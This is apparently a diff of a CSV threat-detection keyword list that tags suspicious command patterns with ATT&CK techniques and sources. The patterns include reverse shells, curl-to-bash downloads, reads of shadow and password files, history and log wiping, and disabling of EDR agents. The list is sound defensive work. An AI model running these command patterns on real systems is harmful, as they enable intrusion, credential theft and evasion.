value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*bad client public DH value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" "*Bad HTTP verb.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" "*bash -c *curl *.sh | bash*","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*bash -c *wget *.sh | bash*","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" -"*bash -i >& /dev/tcp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*bash -i >& /dev/tcp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*bash -i >& /dev/tcp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*bblcccknbdbplgmdjnnikffefhdlobhp*","greyware_tool_keyword","FastStunnel VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*bcdedit* /set {default} bootstatuspolicy ignoreallfailures*","greyware_tool_keyword","bcdedit","Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. adversaries can evade detection and potentially maintain access to the system even after reboots.","T1218.004 - T1562.001","TA0007 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" @@ -350,7 +350,7 @@ "*bibjcjfmgapbfoljiojpipaooddpkpai*","greyware_tool_keyword","VPN-free.pro","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*bihhflimonbpcfagfadcnbbdngpopnjb*","greyware_tool_keyword","DEEPRISM VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*bihmplhobchoageeokmgbdihknkjbknd*","greyware_tool_keyword","Touch VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*binwalk*","greyware_tool_keyword","binwalk","Binwalk is a fast. easy to use tool for analyzing. reverse engineering. and extracting firmware images.","T1059.007 - T1060 - T1057 - T1142 - T1102.003","TA0002 - TA0005 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/ReFirmLabs/binwalk","1","0","greyware tool - risks of False positive !","N/A","10","9640","1442","2023-08-23T23:11:31Z","2013-11-15T20:45:40Z" +"*binwalk*","greyware_tool_keyword","binwalk","Binwalk is a fast. easy to use tool for analyzing. reverse engineering. and extracting firmware images.","T1059.007 - T1060 - T1057 - T1142 - T1102.003","TA0002 - TA0005 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/ReFirmLabs/binwalk","1","0","greyware tool - risks of False positive !","N/A","10","9643","1442","2023-08-23T23:11:31Z","2013-11-15T20:45:40Z" "*bitsadmin /transfer debjob /download /priority normal \*\C$\Windows\*.dll","greyware_tool_keyword","bitsadmin","bitsadmin suspicious transfer","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","N/A","Exploitation Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*bkkgdjpomdnfemhhkalfkogckjdkcjkg*","greyware_tool_keyword","VPNMatic","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*bniikohfmajhdcffljgfeiklcbgffppl*","greyware_tool_keyword","Upnet","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" @@ -372,7 +372,7 @@ "*cat *.zsh_history*","greyware_tool_keyword","cat","show zsh history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" "*cat *.zsh_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cat *bash-history*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" -"*cat /dev/null > *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*cat /dev/null > *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" "*cat /dev/null > /var/log/auth.log*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*cat /dev/null > ~/.bash_history*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*cat /etc/passwd*","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" @@ -386,9 +386,9 @@ "*chrome* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A" "*chrome.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A" "*ckiahbcmlmkpfiijecbpflfahoimklke*","greyware_tool_keyword","Gom VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*Clear-RecycleBin -Force -ErrorAction SilentlyContinue*","greyware_tool_keyword","powershell","Deletes contents of recycle bin","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Clear-RecycleBin -Force -ErrorAction SilentlyContinue*","greyware_tool_keyword","powershell","Deletes contents of recycle bin","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*cmd* wevtutil.exe cl *","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" -"*cmd*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" +"*cmd*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" "*cmd.exe /S /D /c* echo 123","greyware_tool_keyword","echo","Adversaries may attempt to test echo command after exploitation","T1059.001 - T1059.003","TA0002 - TA0006","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*cmd.exe /c chcp >&2*","greyware_tool_keyword","chcp","chcp displays the number of the active console code page","T1059 - T1027","TA0002 - TA0009","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cmd.exe /c echo * > \\.\pipe\*","greyware_tool_keyword","echo","Named pipe impersonation","T1134.002 - T1055 - T1548.002","TA0004 - TA0003 - TA0002","N/A","N/A","Privilege Escalation","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" @@ -407,12 +407,12 @@ "*copy *system.hive \\*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*Copy New *gdrive://www.googleapis.com/GS_Sync/*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*Copy New *sftp://*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" -"*Corrupted MAC on input*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*Corrupted MAC on input*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" "*Could not set file modification time.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" "*couldn't handle sandbox event*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" "*cp /etc/passwd*","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*cp /etc/shadow*","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" -"*cp -i /bin/sh */crond*","greyware_tool_keyword","crond","Masquerading as Linux Crond Process.Masquerading occurs when the name or location of an executable* legitimate or malicious. is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.","T1036 - T1564.003 - T1059.004","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" +"*cp -i /bin/sh */crond*","greyware_tool_keyword","crond","Masquerading as Linux Crond Process.Masquerading occurs when the name or location of an executable* legitimate or malicious. is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.","T1036 - T1564.003 - T1059.004","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" "*crontab* sleep *ncat * -e /bin/bash*crontab*","greyware_tool_keyword","crontab","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","POST Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*curl https://api.hunter.io/v2/domain-search?domain=*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*curl https://api.hunter.io/v2/email-finder?domain=*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" @@ -423,9 +423,9 @@ "*cytool.exe runtime disable*","greyware_tool_keyword","cytool","Disables Cortex XDR (Even with tamper protection enabled)","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A" "*cytool.exe startup disable*","greyware_tool_keyword","cytool","Disables the cortex agent on startup","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A" "*dbdbnchagbkhknegmhgikkleoogjcfge*","greyware_tool_keyword","Hideman VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*dd if=/dev/nul*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" -"*dd if=/dev/zero*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" -"*dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*dd if=/dev/nul*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*dd if=/dev/zero*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*debugfs /dev/*","greyware_tool_keyword","debugdfs","Linux SIEM Bypass with debugdfs shell","T1059 - T1053 - T1037","TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*devtunnel create *","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*devtunnel host -p *","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" @@ -441,15 +441,15 @@ "*dl.wireshark.org*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*dnscmd . /enumrecords /zone *","greyware_tool_keyword","dnscmd","the actor gather information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*dnscmd . /enumzones*","greyware_tool_keyword","dnscmd","the actor gather information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" -"*donate.v2.xmrig.com:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*donate.v2.xmrig.com:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*dpapi.py backupkeys -t */*@*","greyware_tool_keyword","dpapi.py","the command is used to extract the Data Protection API (DPAPI) backup keys from a target system. DPAPI is a Windows API that provides data protection services to secure sensitive data. such as private keys. passwords. and other secrets. By obtaining the DPAPI backup keys. an attacker can potentially decrypt sensitive data stored on the target system or impersonate users. gaining unauthorized access to other systems and resources.","T1552.006","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*dpplabbmogkhghncfbfdeeokoefdjegm*","greyware_tool_keyword","Proxy SwitchySharp","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*dsquery * -filter *(objectClass=trustedDomain)* -attr *","greyware_tool_keyword","dsquery","enumerate domain trusts with dsquery","T1482 - T1018","TA0007","N/A","APT41 - FIN8","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dumpcap -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*echo * .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense 